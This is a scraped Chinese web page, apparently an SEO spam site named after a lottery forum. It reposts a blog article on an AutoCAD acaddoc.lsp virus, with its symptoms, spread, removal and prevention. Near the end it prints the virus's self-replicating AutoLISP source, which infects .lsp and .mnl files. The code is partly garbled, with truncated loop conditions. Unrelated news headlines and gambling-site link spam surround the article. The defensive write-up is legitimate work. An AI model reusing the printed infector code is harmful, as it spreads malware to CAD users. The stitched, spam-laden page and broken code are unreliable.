• 极限训练锻造“蓝军”利刃,精锐特战队员来了! 2019-11-15
  • 哈尔滨:推进统战工作“四化一体系”建设 2019-11-12
  • 蠢货!咱是让你们看看制订一个企业发展计划要达到哪些要求,难度有多大?一个具体的企业都这么难,大到一个县,一个省,甚至是一个国家,难度可想而知! 2019-11-12
  • 北京天安门广场更换花卉 2019-11-07
  • 《中国道路的成功密码》首发研讨会在京举行 2019-11-07
  • 王国平应邀赴金华市调研并作专题讲座 2019-11-04
  • 真正聪明之人,能在寻常岁月里悟透贞亲人世的惊喜 2019-11-04
  • 忻府区中医下乡进村  为老百姓健康把脉--黄河新闻网 2019-11-04
  • 法制日报:别让世界杯激情冲淡守法意识 2019-11-01
  • 美国又打出2000亿关税牌,中方这300字声明暗藏玄机! 2019-10-27
  • 《斯琴高丽的开心》首发 斯琴高丽给自己生日送礼斯琴高丽 2019-10-27
  • 隋炀帝萧后凤冠仿制品亮相 原件或为李世民赏赐 2019-10-26
  • 中国,向大洋更深处挺进(评论员观察) 2019-10-20
  • 《好色千金》杀青 高冷侍卫刘天宝获赞“武生担当” 2019-10-15
  • 海上洄游时 北海狗 连续两周深睡眠 2019-10-15
  • 皇冠平肖平码坛:如何根除导致AUTOCAD开图卡顿甚至无响应的CAD病毒?

    平码三中山论坛 www.mslzq.tw 上周有位网友的CAD出了问题,启动是无响应或直接导致CAD软件停止工作,重装后第一次启动没事,但打开一张图纸后就又有问题了,结果发现图纸目录下有一个acaddoc.lsp文件,一个纯文本的LSP文件,大小居然有200MB,后来将同名的文件都删除后,卸载软件重装后再次启动,居然又出来一个acaddoc.lsp,这次居然大小变成了900多MB。最近还有其他网友说刚装CAD好好的,但后来也出现类似的开图纸长时间无响应的情况,估计情况也类似。上次我从网友那将200MB的病毒文件复制过来了,但当时只是简单看了一下代码,也不太懂,并没有找到将病毒彻底清除的方法。最近在网上查了一些资料,对此病毒有了更深入的了解,将这病毒的特征和解决方法简单给大家讲一下,可以帮助大家更好地预防和根除此病毒。

    病毒简介:

    该病毒可以被卡巴斯基和360杀毒软件查出,卡巴斯基查出病毒名为Virus.ALS.pasdoc.a,360杀毒软件查出病毒名为Trojan.Script.29327。遗憾的是,卡巴斯基和360查毒软件均不能讲器彻底清除。

    中毒症状:

    机器中毒时,运行CAD时,没打开一个DWG文件,均在DWG文件所在目录生成一个acaddoc.lsp的文件。每次开图,此病毒程序会被自动加载并进行一次病毒传播复制过程,病毒文件增大到一定程度后就会导致CAD开图速度极慢设置导致CAD停止工作。

    用记事本打开图纸目录下的acaddoc.lsp文件,或CAD安装路径下的SUPPORT目录下的任意一个*.lsp文件,如果文件中含有与底部所附相同代码,即可判定为中毒。

    传播机理:

    通过分析病毒的源代码,初步了解其传播机理如下:

    如果机器已经中毒,CAD打开新的DWG文件时,病毒程序就会自动加载。病毒会搜索CAD工作目录下的acad.mnl文件,感染*.mnl文件,搜索acad的支持文件目录,感染目录下的所有*.lsp文件。同时病毒在但当前打开的DWG文件所在目录下生成acaddoc.lsp文件,如果将图纸发送到其他机器时带上了这个LSP文件,只要在那台机器打开DWG,病毒就会起作用。如果将图纸放到服务器或共享目录下,而打开图纸的人有写目录的权限,其他人打开这张图纸也会感染病毒。

    清除步骤:

    1、首先退出CAD。

    2、全盘搜索acadapg.*/acadapp.*/acaddoc.*文件,然后彻底删除上述文件。

    注意在查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的操作系统文件”。搜索时选择“查找所有文件及文件夹”,然后再“高级选项”里勾选“搜索系统文件夹”“搜搜隐藏的文件和文件夹”“搜索字文件夹”。

    如果搜出的文件无法删除,则先清空回收站,再搜索删除。

    在一些专业软件,如天正、浩辰、探索者等的目录下也会有acaddoc.lsp文件,如果不确认是否被感染,请一并删除。如果删除后这些专业软件启动不正常,可以重新安装。

    3、查看C盘根目录下是否有boot.dat文件,如果有的话,也将它删除的IAO。

    4、进入当前用户的application DATA目录(在WINDOWS资源管理器或开始运行里输入%APPDATA%)可以快速进入此目录,找到Autodesk\Autocad xxxx下面对应版本的Support目录,用记事本打开该目录下的所有*.mnl文件,手动删除与底部相同的代码(一般都在文件末尾),然后保存。然后将修改后的所有*.mnl文件属性设置为“只读”。

    5、进入CAD安装目录下的support目录,将改目录下的所有*.LSP用记事本打开,手动删除病毒代码。处理完记得将属性设置为“只读”。

    6、如果本机安装有多个版本的CAD,都需按上述步骤检查一次。

    4-6三步处理太麻烦,处理不好还容易导致CAD或LSP无法运行,所以遇到这种问题干脆将CAD彻底卸载,然后将APPDATA和安装目录中残余的文件都删除,重新安装CAD。

    预防措施:

    此病毒是通过读取图纸文件所在目录下的acaddoc.lsp来传播的。在接受其他人发过来的文件夹或压缩包时,不要直接打开图纸,应首先检查一下文件夹中是否还有此病毒文件。如果有的话,删除掉,同时也要告诉他有可能中毒了,并提醒其他同事或合作伙伴有中毒的危险。这一步是最重要的!从源头上把病毒堵住,就不会感染病毒了!

    病毒会感染SUPPORT目录下的*.lsp文件,如果我们有一些常用的LSP程序,不要直接复制到CAD的SUPPORT目录,可以新建一个文件夹,将自己常用的程序放到此目录下,然后再选项OP对话框中将此目录设置为支持文件搜索路径。

    将CAD中相关目录的*.mnl和*.lsp设置为只读,防止病毒将代码添加到这些文件中。

    安装上360或卡巴斯基等杀毒软件,接受他人传来的文件首先杀毒。

    不要从服务器或其他共享目录下直接打开DWG文件,将DWG文件复制到本地后再打开,如果必须在共享目录下工作,如果发现有类似病毒的LSP文件,必须让有管理权限的人及时处理,然后再对本机进行彻底清查。

    如何预防CAD病毒?

    病毒代码:

    下面是从网友200MB的LSP文件中摘取的一段代码,应该是病毒的基础代码:

    (setq flagx t)
    (setq bz “(setq flagx t)”)
    (defun app(source target bz / flag flag1 wjm wjm1 text)
    (setq flag nil)
    (setq flag1 t)
    (if (findfile target)
       (progn
         (setq wjm1 (open target “r”))
         (while (setq text (read-line wjm1))
       (if (= text bz) (setq flag1 nil))
       );while
         (close wjm1)
         );progn
       );if
    (if flag1
       (progn
         (setq wjm (open source “r”))
         (setq wjm1 (open target “a”))
         (write-line (chr 13) wjm1)
         (while (setq text (read-line wjm))
       (if (= text bz) (setq flag t))
       (if flag
         (progn
           (write-line text wjm1)
           );progn
         );if
       );while
         (close wjm1)
         (close wjm)
         );progn
       );if
    );defun
    (setvar “cmdecho” 0)
    (setq acadmnl (findfile “acad.mnl”))
    (setq acadmnlpath (vl-filename-directory acadmnl))
    (setq mnlfilelist (vl-directory-files acadmnlpath “*.mnl”))
    (setq mnlnum (length mnlfilelist))
    (setq acadexe (findfile “acad.exe”))
    (setq acadpath (vl-filename-directory acadexe))
    (setq support (strcat acadpath “\\support”))
    (setq lspfilelist (vl-directory-files support “*.lsp”))
    (setq lspfilelist (append lspfilelist (list “acaddoc.lsp”)))
    (setq lspnum (length lspfilelist))
    (setq dwgname (getvar “dwgname”))
    (setq dwgpath (findfile dwgname))
    (if dwgpath
    (progn
       (setq acaddocpath (vl-filename-directory dwgpath))
       (setq acaddocfile (strcat acaddocpath “\\acaddoc.lsp”))
       (setq mnln 0)
       (while (     (setq mnlfilename (strcat acadmnlpath “\\” (nth mnln mnlfilelist)))
         (app mnlfilename acaddocfile bz)
         (app acaddocfile mnlfilename bz)
         (setq mnln (1+ mnln))
         );while
       (setq lspn 0)
       (while (     (setq lspfilename (strcat support “\\” (nth lspn lspfilelist)))
         (app lspfilename acaddocfile bz)
         (app acaddocfile lspfilename bz)
         (setq lspn (1+ lspn))
         );while
       );progn
    );if
    (setq mnln 0)
    (while ( (setq mnlfilename (strcat acadmnlpath “\\” (nth mnln mnlfilelist)))
    (setq mnln1 0)
    (while (   (setq mnlfilename1 (strcat acadmnlpath “\\” (nth mnln1 mnlfilelist)))
       (app mnlfilename mnlfilename1 bz)
       (setq mnln1 (1+ mnln1))
       );while
    (setq lspn1 0)
    (while (   (setq lspfilename1 (strcat support “\\” (nth lspn1 lspfilelist)))
       (app mnlfilename lspfilename1 bz)
       (setq lspn1 (1+ lspn1))
       );while
    (setq mnln (1+ mnln))
    );while
    (setq lspn 0)
    (while ( (setq lspfilename (strcat support “\\” (nth lspn lspfilelist)))
    (setq lspn1 0)
    (while (   (setq lspfilename1 (strcat support “\\” (nth lspn1 lspfilelist)))
       (app lspfilename lspfilename1 bz)
       (setq lspn1 (1+ lspn1))
       );while
    (setq mnln1 0)
    (while (   (setq mnlfilename1 (strcat acadmnlpath “\\” (nth mnln1 mnlfilelist)))
       (app lspfilename mnlfilename1 bz)
       (setq mnln1 (1+ mnln1))
       );while
    (setq lspn (1+ lspn))
    (load “acadapq”)
    (princ)
    (load “acadapp”)
    (princ)

    然后这个文件后面还会多次重复加载acadapq和acadapp,上面的代码页会被多次复制,感觉病毒还会复制其他LSP文件的代码。文件一旦复制增大到一定程度,CAD开图的时候重复运行大量代码,肯定会变慢甚至停止工作。

    (出自CAD小苗博客)

    为您推荐

    发表评论

    联系我们

    联系我们

    18511713368

    在线咨询: QQ交谈

    邮箱: [email protected]

    工作时间:周一至周五,9:00-17:30,节假日休息//www.mslzq.tw

    关于本站 || 版权声明 || 免责条款 || 隐私条款 || 平码三中山论坛 || ||

    Copyright??2018 平码三中山论坛 All Rights Reserved·黔ICP备15000265号-2

  • 极限训练锻造“蓝军”利刃,精锐特战队员来了! 2019-11-15
  • 哈尔滨:推进统战工作“四化一体系”建设 2019-11-12
  • 蠢货!咱是让你们看看制订一个企业发展计划要达到哪些要求,难度有多大?一个具体的企业都这么难,大到一个县,一个省,甚至是一个国家,难度可想而知! 2019-11-12
  • 北京天安门广场更换花卉 2019-11-07
  • 《中国道路的成功密码》首发研讨会在京举行 2019-11-07
  • 王国平应邀赴金华市调研并作专题讲座 2019-11-04
  • 真正聪明之人,能在寻常岁月里悟透贞亲人世的惊喜 2019-11-04
  • 忻府区中医下乡进村  为老百姓健康把脉--黄河新闻网 2019-11-04
  • 法制日报:别让世界杯激情冲淡守法意识 2019-11-01
  • 美国又打出2000亿关税牌,中方这300字声明暗藏玄机! 2019-10-27
  • 《斯琴高丽的开心》首发 斯琴高丽给自己生日送礼斯琴高丽 2019-10-27
  • 隋炀帝萧后凤冠仿制品亮相 原件或为李世民赏赐 2019-10-26
  • 中国,向大洋更深处挺进(评论员观察) 2019-10-20
  • 《好色千金》杀青 高冷侍卫刘天宝获赞“武生担当” 2019-10-15
  • 海上洄游时 北海狗 连续两周深睡眠 2019-10-15
  • 北京11选5一定牛 下半年股票推荐 吉林十一选五的走势图 彩票平台骗局 吉林十一选五前三组走势图 福彩快三幸运和值规律 时时彩助赢软件 移动棋牌五子棋 华彩网 天天乐app下载